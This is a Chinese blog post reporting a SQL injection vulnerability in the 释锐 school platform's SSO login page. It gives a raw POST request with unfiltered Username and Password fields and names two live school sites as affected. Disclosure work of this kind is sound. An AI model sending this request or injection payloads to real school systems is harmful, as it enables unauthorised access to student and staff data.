释锐是全国领先的智慧教育解决方案供应商。致力于通过技术创新为中小学、职校、高校和教育行政管理机构提供有竞争力的智慧教育解决方案和服务,持续提升客户体验,为客户创造最大价值。目前,释锐的产品和解决方案已经应用于 25 个省市,服务全国 3000 多所学校。
此漏洞已验证,具有通用性。

以这个站为例:

POST /us/user/sso.jsp HTTP/1.1

Content-Length: 163

Content-Type: application/x-www-form-urlencoded

X-Requested-With: XMLHttpRequest

Referer: http://www.sgzx.fx.edu.sh.cn:80/

Cookie: JSESSIONID=3B6DAA95024B941442DC11D705E9486D

Host: www.sgzx.fx.edu.sh.cn

Connection: Keep-alive

Accept-Encoding: gzip,deflate

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36

Accept: */*

Password=&ssourl=http://www.sgzx.fx.edu.sh.cn/sc/user/login.jsp%3f1%3d1&type=1&url=%252fsc&Username=-1&Usertype=2

对Username和Password未过滤,造成了POST型注入,一下截图为Username字段注入的截图。

此站也存在 www.hshsh.pudong-edu.sh.cn 用的都是同一套系统。
 

释锐教育校校用平台通用SQL注入漏洞 – 网站安全插图

 

释锐教育校校用平台通用SQL注入漏洞 – 网站安全插图1

 

修复方案:

过滤

    上一篇: FengCms过滤不言导致sql注入,可爆管理用户名密码

    下一篇: NITC营销系统SQL注入漏洞 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《释锐教育校校用平台通用SQL注入漏洞 – 网站安全
   

还没有人抢沙发呢~